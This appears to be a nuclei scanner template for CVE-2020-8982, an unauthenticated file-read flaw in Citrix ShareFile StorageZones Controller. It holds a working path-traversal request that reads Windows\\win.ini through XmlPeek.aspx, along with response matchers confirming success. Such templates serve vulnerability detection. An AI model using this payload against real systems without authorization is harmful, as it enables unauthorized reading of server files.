nuclei-templates/cves/2020/CVE-2020-8982.yaml

37 lines
1.2 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8982
info:
name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
author: dwisiswant0
severity: high
description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
reference:
- https://support.citrix.com/article/CTX269106
- https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
- https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-8982
cwe-id: CWE-22
tags: cve,cve2020,citrix,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
2020-08-25 22:52:00 +00:00
part: body
# Enhanced by mp on 2022/06/27